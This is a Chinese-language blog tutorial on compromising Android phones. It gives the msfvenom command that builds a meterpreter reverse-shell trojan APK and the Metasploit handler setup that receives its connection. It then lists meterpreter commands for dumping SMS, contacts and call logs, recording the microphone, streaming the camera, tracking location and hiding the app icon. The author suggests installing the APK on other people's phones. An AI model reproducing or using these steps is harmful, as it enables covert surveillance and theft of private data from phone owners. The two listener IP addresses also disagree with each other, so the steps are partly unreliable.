渗透安卓手机

这篇文章还是在学校的时候写的，原来都这么久了啊，现在看起来一点技术含量都没有。。。

网上都能找的到的教程，在这里我只是发出来做个保存+分享
在kali中，步骤：
输入命令：

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.105 LPORT=5555 R > /root/apk.apk

（LHOST填写自己的kali的IP地址、LPORT填写通信端口，可以自己更改 、最后面的路径是生成出APP文件的路径以及文件名）
然后启动msf：

msfconsole

然后输入命令：

use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
show options //查看参数设置
set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成APP木马的IP地址
set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
exploit //开始执行漏洞 开始监听,等待手机上线

可以把生成出来的APP放入别人手机中，实验的话把需要的权限都开上吧，打开APP，其实是打不开的，点击一下APP就已经开始工作了。然后便可在kali中输入“？”查看到所有可以执行的命令。
以下是全部命令

核心命令
=============
     命令                      说明
    -------                   -----------
    ?                         帮助菜单
    background                当前会话
    bgkill                    终止一个meterpreter脚本
    bglist                    列出运行后台脚本
    bgrun                     执行一个meterpreter脚本作为后台线程
    channel                   显示信息或控制活动频道
    close                     关闭频道
    disable_unicode_encoding  禁用unicode字符串的编码
    enable_unicode_encoding   启用unicode字符串的编码
    exit                      终止meterpreter会话
    get_timeouts              获取当前会话超时值
    guid                      获取会话GUID
    help                      帮助菜单
    info                      显示有关Post模块的信息
    irb                       进入irb脚本模式
    load                      加载一个或多个meterpreter扩展
    machine_id                获取连接到会话的计算机的MSF ID
    quit                      终止meterpreter会话
    read                      从频道读取数据
    resource                  运行存储在文件中的命令
    run                       执行meterpreter脚本或Post模块
    sessions                  快速切换到另一个会话
    set_timeouts              设置当前会话超时值
    sleep                     暴力静止Meterpreter会话，然后重新建立会话。
    transport                 更改当前的传输机制
    use                       不推荐使用“load”别名
    uuid                      获取当前会话的UUID
    write                     将数据写入通道
Stdapi：文件系统命令
============================
     命令          说明
    -------       -----------
    cat           将文件的内容读取到屏幕上
    cd            更改目录
    checksum      检索文件的校验和
    cp            将源复制到目标
    dir           列表文件（ls的别名）
    download      下载文件或目录
    edit          编辑文件
    getlwd        打印本地工作目录
    getwd         打印工作目录
    lcd           更改本地工作目录
    lls           列出本地文件
    lpwd          打印本地工作目录
    ls            列出文件
    mkdir         建立目录
    mv            将源移到目标
    pwd           打印工作目录
    rm            删除指定的文件
    rmdir         删除目录
    search        搜索文件
    upload        上传文件或目录
Stdapi：网络命令
===========================
     命令          说明
    -------       -----------
    ifconfig      显示界面
    ipconfig      显示界面
    portfwd       将本地端口转发到远程服务
    route         查看和修改路由表
Stdapi：系统命令
=======================
     命令          说明
    -------       -----------
    execute       执行一个命令
    getuid        获取服务器正在运行的用户
    localtime     显示目标系统的本地日期和时间
    pgrep         按名称过滤进程
    ps            列出运行的进程
    shell         放入系统命令外壳
    sysinfo       获取有关远程系统的信息，例如OS
Stdapi：用户界面命令
===============================
     命令          说明
    -------       -----------
    screenshot    获取交互式桌面的屏幕截图
Stdapi：网络摄像头命令
=======================
     命令           说明
    -------        -----------
    record_mic     从默认麦克风录制音频X秒
    webcam_chat    开始视频聊天
    webcam_list    列出网络摄像头
    webcam_snap    从指定的摄像头拍摄快照
    webcam_stream  从指定的摄像头播放视频流
Android命令
================
     命令              说明
    -------           -----------
    activity_start    从Uri字符串开始一个Android活动
    check_root        检查设备是否生根
    dump_calllog      获取通话记录
    dump_contacts     获取联系人列表
    dump_sms          获取短信
    geolocate         使用地理位置获取当前的经纬度
    hide_app_icon     隐藏启动器中的应用程序图标
    interval_collect  管理间隔收集功能
    send_sms          从目标会话发送短信
    set_audio_mode    设置振铃模式
    sqlite_query      从存储中查询SQLite数据库
    wakelock          启用/禁用Wakelock
    wlan_geolocate    使用WLAN信息获取当前经纬度